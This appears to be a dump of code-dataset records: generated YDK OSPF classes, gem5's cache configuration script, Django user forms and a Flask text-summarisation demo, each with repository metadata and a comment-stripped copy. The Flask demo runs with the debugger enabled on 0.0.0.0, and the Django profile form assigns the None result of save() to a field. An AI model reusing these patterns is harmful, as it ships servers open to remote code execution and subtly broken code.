self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def 
__init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True 
self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): 
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 
'topo_forwarding_address', 'topo_route_tag'], name, value) def clone_ptr(self): self._top_entity = OspfOperData() return self._top_entity
true
true
f705ab09a5963cd25258cf441567b8cdaf1b0983
10,096
py
Python
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
3
2019-07-19T22:52:27.000Z
2020-05-26T04:37:46.000Z
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
1
2019-07-22T16:41:56.000Z
2019-07-22T16:41:56.000Z
configs/common/CacheConfig.py
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
[ "BSD-3-Clause" ]
2
2019-06-26T14:33:42.000Z
2019-10-02T02:09:23.000Z
# Copyright (c) 2012-2013, 2015-2016 ARM Limited # All rights reserved # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Copyright (c) 2010 Advanced Micro Devices, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Lisa Hsu # Configure the M5 cache hierarchy config in one place # from __future__ import print_function from __future__ import absolute_import import m5 from m5.objects import * from .Caches import * from . import HWPConfig def config_cache(options, system): if options.external_memory_system and (options.caches or options.l2cache): print("External caches and internal caches are exclusive options.\n") sys.exit(1) if options.external_memory_system: ExternalCache = ExternalCacheFactory(options.external_memory_system) if options.cpu_type == "O3_ARM_v7a_3": try: import cores.arm.O3_ARM_v7a as core except: print("O3_ARM_v7a_3 is unavailable. 
Did you compile the O3 model?") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \ core.O3_ARM_v7aL2, \ core.O3_ARM_v7aWalkCache elif options.cpu_type == "HPI": try: import cores.arm.HPI as core except: print("HPI is unavailable.") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache else: dcache_class, icache_class, l2_cache_class, walk_cache_class = \ L1_DCache, L1_ICache, L2Cache, None if buildEnv['TARGET_ISA'] == 'x86': walk_cache_class = PageTableWalkerCache # Set the cache line size of the system system.cache_line_size = options.cacheline_size # If elastic trace generation is enabled, make sure the memory system is # minimal so that compute delays do not include memory access latencies. # Configure the compulsory L1 caches for the O3CPU, do not configure # any more caches. if options.l2cache and options.elastic_trace_en: fatal("When elastic trace is enabled, do not configure L2 caches.") if options.l2cache: # Provide a clock for the L2 and the L1-to-L2 bus here as they # are not connected using addTwoLevelCacheHierarchy. Use the # same clock as the CPUs. 
system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain, size=options.l2_size, assoc=options.l2_assoc) system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain) system.l2.cpu_side = system.tol2bus.master system.l2.mem_side = system.membus.slave if options.l2_hwp_type: hwpClass = HWPConfig.get(options.l2_hwp_type) if system.l2.prefetcher != "Null": print("Warning: l2-hwp-type is set (", hwpClass, "), but", "the current l2 has a default Hardware Prefetcher", "of type", type(system.l2.prefetcher), ", using the", "specified by the flag option.") system.l2.prefetcher = hwpClass() if options.memchecker: system.memchecker = MemChecker() for i in range(options.num_cpus): if options.caches: icache = icache_class(size=options.l1i_size, assoc=options.l1i_assoc) dcache = dcache_class(size=options.l1d_size, assoc=options.l1d_assoc) # If we have a walker cache specified, instantiate two # instances here if walk_cache_class: iwalkcache = walk_cache_class() dwalkcache = walk_cache_class() else: iwalkcache = None dwalkcache = None if options.memchecker: dcache_mon = MemCheckerMonitor(warn_only=True) dcache_real = dcache # Do not pass the memchecker into the constructor of # MemCheckerMonitor, as it would create a copy; we require # exactly one MemChecker instance. 
dcache_mon.memchecker = system.memchecker # Connect monitor dcache_mon.mem_side = dcache.cpu_side # Let CPU connect to monitors dcache = dcache_mon if options.l1d_hwp_type: hwpClass = HWPConfig.get(options.l1d_hwp_type) if dcache.prefetcher != m5.params.NULL: print("Warning: l1d-hwp-type is set (", hwpClass, "), but", "the current l1d has a default Hardware Prefetcher", "of type", type(dcache.prefetcher), ", using the", "specified by the flag option.") dcache.prefetcher = hwpClass() if options.l1i_hwp_type: hwpClass = HWPConfig.get(options.l1i_hwp_type) if icache.prefetcher != m5.params.NULL: print("Warning: l1i-hwp-type is set (", hwpClass, "), but", "the current l1i has a default Hardware Prefetcher", "of type", type(icache.prefetcher), ", using the", "specified by the flag option.") icache.prefetcher = hwpClass() # When connecting the caches, the clock is also inherited # from the CPU in question system.cpu[i].addPrivateSplitL1Caches(icache, dcache, iwalkcache, dwalkcache) if options.memchecker: # The mem_side ports of the caches haven't been connected yet. # Make sure connectAllPorts connects the right objects. system.cpu[i].dcache = dcache_real system.cpu[i].dcache_mon = dcache_mon elif options.external_memory_system: # These port names are presented to whatever 'external' system # gem5 is connecting to. Its configuration will likely depend # on these names. For simplicity, we would advise configuring # it to use this naming scheme; if this isn't possible, change # the names below. 
if buildEnv['TARGET_ISA'] in ['x86', 'arm']: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i), ExternalCache("cpu%d.itb_walker_cache" % i), ExternalCache("cpu%d.dtb_walker_cache" % i)) else: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i)) system.cpu[i].createInterruptController() if options.l2cache: system.cpu[i].connectAllPorts(system.tol2bus, system.membus) elif options.external_memory_system: system.cpu[i].connectUncachedPorts(system.membus) else: system.cpu[i].connectAllPorts(system.membus) return system # ExternalSlave provides a "port", but when that port connects to a cache, # the connecting CPU SimObject wants to refer to its "cpu_side". # The 'ExternalCache' class provides this adaptation by rewriting the name, # eliminating distracting changes elsewhere in the config code. class ExternalCache(ExternalSlave): def __getattr__(cls, attr): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__getattr__(attr) def __setattr__(cls, attr, value): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__setattr__(attr, value) def ExternalCacheFactory(port_type): def make(name): return ExternalCache(port_data=name, port_type=port_type, addr_ranges=[AllMemory]) return make
44.475771
79
0.639758
from __future__ import print_function from __future__ import absolute_import import m5 from m5.objects import * from .Caches import * from . import HWPConfig def config_cache(options, system): if options.external_memory_system and (options.caches or options.l2cache): print("External caches and internal caches are exclusive options.\n") sys.exit(1) if options.external_memory_system: ExternalCache = ExternalCacheFactory(options.external_memory_system) if options.cpu_type == "O3_ARM_v7a_3": try: import cores.arm.O3_ARM_v7a as core except: print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \ core.O3_ARM_v7aL2, \ core.O3_ARM_v7aWalkCache elif options.cpu_type == "HPI": try: import cores.arm.HPI as core except: print("HPI is unavailable.") sys.exit(1) dcache_class, icache_class, l2_cache_class, walk_cache_class = \ core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache else: dcache_class, icache_class, l2_cache_class, walk_cache_class = \ L1_DCache, L1_ICache, L2Cache, None if buildEnv['TARGET_ISA'] == 'x86': walk_cache_class = PageTableWalkerCache system.cache_line_size = options.cacheline_size if options.l2cache and options.elastic_trace_en: fatal("When elastic trace is enabled, do not configure L2 caches.") if options.l2cache: system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain, size=options.l2_size, assoc=options.l2_assoc) system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain) system.l2.cpu_side = system.tol2bus.master system.l2.mem_side = system.membus.slave if options.l2_hwp_type: hwpClass = HWPConfig.get(options.l2_hwp_type) if system.l2.prefetcher != "Null": print("Warning: l2-hwp-type is set (", hwpClass, "), but", "the current l2 has a default Hardware Prefetcher", "of type", type(system.l2.prefetcher), ", using the", "specified by the flag option.") system.l2.prefetcher = hwpClass() if 
options.memchecker: system.memchecker = MemChecker() for i in range(options.num_cpus): if options.caches: icache = icache_class(size=options.l1i_size, assoc=options.l1i_assoc) dcache = dcache_class(size=options.l1d_size, assoc=options.l1d_assoc) if walk_cache_class: iwalkcache = walk_cache_class() dwalkcache = walk_cache_class() else: iwalkcache = None dwalkcache = None if options.memchecker: dcache_mon = MemCheckerMonitor(warn_only=True) dcache_real = dcache dcache_mon.memchecker = system.memchecker dcache_mon.mem_side = dcache.cpu_side dcache = dcache_mon if options.l1d_hwp_type: hwpClass = HWPConfig.get(options.l1d_hwp_type) if dcache.prefetcher != m5.params.NULL: print("Warning: l1d-hwp-type is set (", hwpClass, "), but", "the current l1d has a default Hardware Prefetcher", "of type", type(dcache.prefetcher), ", using the", "specified by the flag option.") dcache.prefetcher = hwpClass() if options.l1i_hwp_type: hwpClass = HWPConfig.get(options.l1i_hwp_type) if icache.prefetcher != m5.params.NULL: print("Warning: l1i-hwp-type is set (", hwpClass, "), but", "the current l1i has a default Hardware Prefetcher", "of type", type(icache.prefetcher), ", using the", "specified by the flag option.") icache.prefetcher = hwpClass() system.cpu[i].addPrivateSplitL1Caches(icache, dcache, iwalkcache, dwalkcache) if options.memchecker: # Make sure connectAllPorts connects the right objects. system.cpu[i].dcache = dcache_real system.cpu[i].dcache_mon = dcache_mon elif options.external_memory_system: # These port names are presented to whatever 'external' system # gem5 is connecting to. Its configuration will likely depend # on these names. 
For simplicity, we would advise configuring # it to use this naming scheme; if this isn't possible, change if buildEnv['TARGET_ISA'] in ['x86', 'arm']: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i), ExternalCache("cpu%d.itb_walker_cache" % i), ExternalCache("cpu%d.dtb_walker_cache" % i)) else: system.cpu[i].addPrivateSplitL1Caches( ExternalCache("cpu%d.icache" % i), ExternalCache("cpu%d.dcache" % i)) system.cpu[i].createInterruptController() if options.l2cache: system.cpu[i].connectAllPorts(system.tol2bus, system.membus) elif options.external_memory_system: system.cpu[i].connectUncachedPorts(system.membus) else: system.cpu[i].connectAllPorts(system.membus) return system class ExternalCache(ExternalSlave): def __getattr__(cls, attr): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__getattr__(attr) def __setattr__(cls, attr, value): if (attr == "cpu_side"): attr = "port" return super(ExternalSlave, cls).__setattr__(attr, value) def ExternalCacheFactory(port_type): def make(name): return ExternalCache(port_data=name, port_type=port_type, addr_ranges=[AllMemory]) return make
true
true
f705ab4544bccecfcecc8f47c620ff3d110450c3
4,475
py
Python
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
users/user_forms.py
dennisfarmer/texas-hospital-hackathon
dabf80a2c3d78d595280d4ff9475176da4848349
[ "MIT" ]
null
null
null
from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm # from crispy_forms.helper import FormHelper # from crispy_forms.layout import Submit import sys import os from .models import User_Profile sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from orders.models import Location, Location_Info from orders.locations import get_location_choices class UserCreationForm(BaseUserCreationForm): name = forms.CharField(label="Full Name") location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) email = forms.EmailField( required=False, label="Email", help_text = "(not required)" ) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User fields = [ "name", "username", "password1", "password2", "location_id", "email", "phone" ] def save(self, commit=True, *args, **kwargs): user = super(UserCreationForm, self).save(commit=False, *args, **kwargs) name = self.cleaned_data["name"] if len(name.split()) >= 2: user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title()) elif len(name.split()) == 1: user.first_name = name.title() user.last_name = "" user.set_password(self.cleaned_data["password1"]) user.email = self.cleaned_data["email"] if commit: user.save() user.profile.phone = self.cleaned_data["phone"] location_id = int(self.cleaned_data["location_id"]) loc = Location( username = user.username, location_id = location_id, info = Location_Info.objects.filter(pk=location_id).first() ) loc.save() user.profile.location = loc user.profile.save() user.save() return user class UserUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): email = kwargs.get("instance").email super(UserUpdateForm, self).__init__(*args, **kwargs) self.initial["email"] = email # self.helper = 
FormHelper(self) # self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info")) # self.helper.form_method = "POST" email = forms.EmailField( required=False, label="Email", help_text = "(not required)") class Meta: model = User fields = ["username", "email"] class ProfileUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): location_id = kwargs.get("instance").location.location_id phone = kwargs.get("instance").phone super(ProfileUpdateForm, self).__init__(*args, **kwargs) self.initial["location_id"] = location_id self.initial["phone"] = phone # self.helper = FormHelper(self) # self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info")) # self.helper.form_method = "POST" location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User_Profile fields = ["image", "location_id", "phone"] def save(self, commit=True, *args, **kwargs): profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs) if commit: profile.save() profile.phone = self.cleaned_data["phone"] new_location_id = int(self.cleaned_data["location_id"]) profile.location.delete() new_location = Location( username = self.instance.user.username, location_id = new_location_id, info = Location_Info.objects.filter(pk=new_location_id).first() ).save() profile.location = new_location profile.save() return profile
33.646617
97
0.604469
from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm import sys import os from .models import User_Profile sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from orders.models import Location, Location_Info from orders.locations import get_location_choices class UserCreationForm(BaseUserCreationForm): name = forms.CharField(label="Full Name") location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) email = forms.EmailField( required=False, label="Email", help_text = "(not required)" ) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User fields = [ "name", "username", "password1", "password2", "location_id", "email", "phone" ] def save(self, commit=True, *args, **kwargs): user = super(UserCreationForm, self).save(commit=False, *args, **kwargs) name = self.cleaned_data["name"] if len(name.split()) >= 2: user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title()) elif len(name.split()) == 1: user.first_name = name.title() user.last_name = "" user.set_password(self.cleaned_data["password1"]) user.email = self.cleaned_data["email"] if commit: user.save() user.profile.phone = self.cleaned_data["phone"] location_id = int(self.cleaned_data["location_id"]) loc = Location( username = user.username, location_id = location_id, info = Location_Info.objects.filter(pk=location_id).first() ) loc.save() user.profile.location = loc user.profile.save() user.save() return user class UserUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): email = kwargs.get("instance").email super(UserUpdateForm, self).__init__(*args, **kwargs) self.initial["email"] = email email = forms.EmailField( required=False, label="Email", help_text = "(not required)") class Meta: model = 
User fields = ["username", "email"] class ProfileUpdateForm(forms.ModelForm): def __init__(self, *args, **kwargs): location_id = kwargs.get("instance").location.location_id phone = kwargs.get("instance").phone super(ProfileUpdateForm, self).__init__(*args, **kwargs) self.initial["location_id"] = location_id self.initial["phone"] = phone location_id = forms.ChoiceField( label="Hospital Location:", help_text="Select an option from the menu above.", choices=get_location_choices()) phone = forms.CharField( required=False, max_length=12, label="Mobile Number", help_text="(not required)") class Meta: model = User_Profile fields = ["image", "location_id", "phone"] def save(self, commit=True, *args, **kwargs): profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs) if commit: profile.save() profile.phone = self.cleaned_data["phone"] new_location_id = int(self.cleaned_data["location_id"]) profile.location.delete() new_location = Location( username = self.instance.user.username, location_id = new_location_id, info = Location_Info.objects.filter(pk=new_location_id).first() ).save() profile.location = new_location profile.save() return profile
true
true
f705ab6b22fcd6f8fa7f8f53688eda2185ea5ef3
1,971
py
Python
WebDemo/flask_app/main.py
silenceliang/Cascading-agents-hybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
1
2020-02-23T15:38:18.000Z
2020-02-23T15:38:18.000Z
WebDemo/flask_app/main.py
silenceliang/CascadingAgentsHybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
null
null
null
WebDemo/flask_app/main.py
silenceliang/CascadingAgentsHybridSum
6c127df51bd8cc926878f62ebdb66bc1042bb58c
[ "MIT" ]
null
null
null
from flask import render_template, request from flask_script import Manager, Server from app import app from model import Content, Summary, Article import app.static.summ as summarizationModel import os, json, logging @app.route('/', endpoint='ACCESS') @app.route('/index.html', endpoint='ACCESSFILE') def index(): try: all_pairs = Article.objects.all() return render_template('index.html', history=all_pairs) except Exception as e: logging.error(e) raise e @app.route('/run_decode', methods=['POST']) def run_decode(): logging.debug('decode your input by our pretrained model') try: source = request.get_json()['source'] # GET request with String from frontend directly logging.debug('input: {}'.format(source)) # GET String-type context from the backend try: logging.debug('using the pretrained model.') sentNums, summary = summarizationModel.decode.run_(source) except Exception as e: logging.error(e) else: logging.debug('The number of sentences is {}'.format(sentNums)) logging.debug('The abstract is that {}'.format(summary)) results = {'sent_no': sentNums, 'final': summary} try: article = Content(text=source) abstract = Summary(text=summary) pair = Article(article=article.id, abstract=abstract.id) article.save() abstract.save() pair.save() except Exception as e: logging.error(e) return json.dumps(results) except: message = {'message' : 'Fail to catch the data from client.'} return json.dumps(message) manager = Manager(app) manager.add_command('runserver', Server( use_debugger = True, use_reloader = True, host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5001)) )) if __name__ == "__main__": manager.run()
32.311475
94
0.624049
from flask import render_template, request from flask_script import Manager, Server from app import app from model import Content, Summary, Article import app.static.summ as summarizationModel import os, json, logging @app.route('/', endpoint='ACCESS') @app.route('/index.html', endpoint='ACCESSFILE') def index(): try: all_pairs = Article.objects.all() return render_template('index.html', history=all_pairs) except Exception as e: logging.error(e) raise e @app.route('/run_decode', methods=['POST']) def run_decode(): logging.debug('decode your input by our pretrained model') try: source = request.get_json()['source'] logging.debug('input: {}'.format(source)) try: logging.debug('using the pretrained model.') sentNums, summary = summarizationModel.decode.run_(source) except Exception as e: logging.error(e) else: logging.debug('The number of sentences is {}'.format(sentNums)) logging.debug('The abstract is that {}'.format(summary)) results = {'sent_no': sentNums, 'final': summary} try: article = Content(text=source) abstract = Summary(text=summary) pair = Article(article=article.id, abstract=abstract.id) article.save() abstract.save() pair.save() except Exception as e: logging.error(e) return json.dumps(results) except: message = {'message' : 'Fail to catch the data from client.'} return json.dumps(message) manager = Manager(app) manager.add_command('runserver', Server( use_debugger = True, use_reloader = True, host = os.getenv('IP', '0.0.0.0'), port = int(os.getenv('PORT', 5001)) )) if __name__ == "__main__": manager.run()
true
true
f705abab94d05422bd97d62349625cd2fa0906e4
15,678
py
Python
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
synapse/http/server.py
theworldbright/synapse
6783534a0f9f34d6972a31af368ee2324e2033f3
[ "Apache-2.0" ]
null
null
null
